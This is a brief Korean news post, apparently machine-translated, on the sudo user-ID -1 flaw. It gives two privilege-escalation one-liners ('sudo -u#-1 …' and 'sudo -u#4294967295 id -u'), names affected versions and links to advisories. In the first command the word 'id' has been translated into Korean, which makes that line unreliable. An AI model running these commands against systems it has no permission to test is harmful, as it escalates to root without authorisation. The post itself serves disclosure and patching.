sudo의 취약점

sudo의 버그로 인해 /etc/sudoers가 다른 사용자의 실행을 허용하고 루트에서는 금지된 경우 실행 파일을 루트로 실행할 수 있습니다.

오류를 이용하는 방법은 매우 간단합니다.

sudo -u#-1 아이디 -u

또는 :

sudo -u#4294967295 id -u

이 오류는 1.8.28 이전의 모든 sudo 버전에 존재합니다.

세부 사항 :

https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html


https://www.sudo.ws/alerts/minus_1_uid.html

출처 : linux.org.ru

코멘트를 추가